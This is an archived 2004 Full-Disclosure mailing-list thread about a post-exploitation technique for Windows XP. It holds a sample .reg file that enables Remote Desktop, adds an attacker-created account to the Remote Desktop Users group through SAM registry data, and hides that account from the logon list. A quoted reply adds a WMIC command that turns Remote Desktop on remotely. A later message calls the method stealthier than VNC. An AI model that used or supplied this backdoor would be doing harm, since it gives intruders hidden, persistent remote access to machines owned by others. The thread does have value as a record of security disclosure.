lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
From: fixer907 at gmail.com (Fixer)
Subject: XP Remote Desktop Remote Activation

Agreed, but you'll note that this will only turn it on for
Administrator, not for the user that you've created.  At the point
where you've gotten a remote shell (call it via lsass, dameware, or
whatever) you're sitting there in the SYSTEM context.  You've still
got to create the account and give it rights to RD.  Doing it that way
is only half the battle.  You could use VNC, but this way leaves less
of a footprint since you're using the built-in MS utils.

Fixer


On Sat, 2 Oct 2004 17:43:11 +0200, Dominick Baier
<seclists@...stprivilege.com> wrote:
> if you have an administrator password for the machine you can just use WMIC
> to turn remote desktop on.
> 
> wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server"
> CALL SetAllowTSConnections 1
> 
> dominick
> www.leastprivilege.com
> 
> 
> 
> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Fixer
> Sent: Samstag, 2. Oktober 2004 06:51
> To: full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] XP Remote Desktop Remote Activation
> 
> XP Remote Desktop Remote Activation
> 
> Information
> ____________________________________________________________________
> Windows XP Professional provides a service called Remote Desktop, which
> allows a user to remotely control the desktop as if he or she were in front
> of the system locally (ala VNC, pcAnywhere, etc.).
> 
> By default, Remote Desktop is shipped with this service turned off and only
> the Administrator is allowed access to this service.  It is possible,
> however, to modify a series of registry keys that may allow a malicious user
> who has already gained a command shell to activate Remote Desktop and add a
> user they have created for themselves as well as to hide that user so that
> it will not show up as a user in the Remote Desktop user list.  The
> instructions for this are attached.
> Additionally, I have listed a sample .reg file of the type that is discussed
> in the instructions below.
> _____________________________________________________________________
> 
> Final Stuff
> 
> To the Frozen Chozen...On-On (www.frozen-chozen-h3.org)
> 
> On to the exploit....   Fixer
> 
> _____________________________________________________________________
> 
> .reg file  (remember, the xx xx are the values you need to change)
> 
> Windows Registry Editor Version 5.00
> 
> [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\0000022B]
> "C"=hex:2b,02,00,00,00,00,00,00,b0,00,00,00,02,00,01,00,b0,00,00,00,28,00,00
> ,\
> 
> 00,00,00,00,00,d8,00,00,00,7a,00,00,00,00,00,00,00,54,01,00,00,1c,00,00,00,\
> 
> 01,00,00,00,01,00,14,80,90,00,00,00,a0,00,00,00,14,00,00,00,44,00,00,00,02,\
> 
> 00,30,00,02,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
> 
> 00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,00,4c,\
> 
> 00,03,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,01,00,00,00,00,\
> 
> 00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,\
> 
> 00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,01,02,\
> 
> 00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,\
> 
> 00,20,02,00,00,52,00,65,00,6d,00,6f,00,74,00,65,00,20,00,44,00,65,00,73,00,\
> 
> 6b,00,74,00,6f,00,70,00,20,00,55,00,73,00,65,00,72,00,73,00,4d,00,65,00,6d,\
> 
> 00,62,00,65,00,72,00,73,00,20,00,69,00,6e,00,20,00,74,00,68,00,69,00,73,00,\
> 
> 20,00,67,00,72,00,6f,00,75,00,70,00,20,00,61,00,72,00,65,00,20,00,67,00,72,\
> 
> 00,61,00,6e,00,74,00,65,00,64,00,20,00,74,00,68,00,65,00,20,00,72,00,69,00,\
> 
> 67,00,68,00,74,00,20,00,74,00,6f,00,20,00,6c,00,6f,00,67,00,6f,00,6e,00,20,\
> 
> 00,72,00,65,00,6d,00,6f,00,74,00,65,00,6c,00,79,00,00,00,01,05,00,00,00,00,\
>  00,05,15,00,00,00,d8,52,bb,80,c4,9d,6f,b9,b9,67,c7,13,xx,xx,00,00
> 
> [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
> "fDenyTSConnections"=dword:00000000
> 
> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
> "lus3r"=dword:00000000
> 
> (obviously change "lus3r" to the name of the account you created)
> 
>


Powered by blists - more mailing lists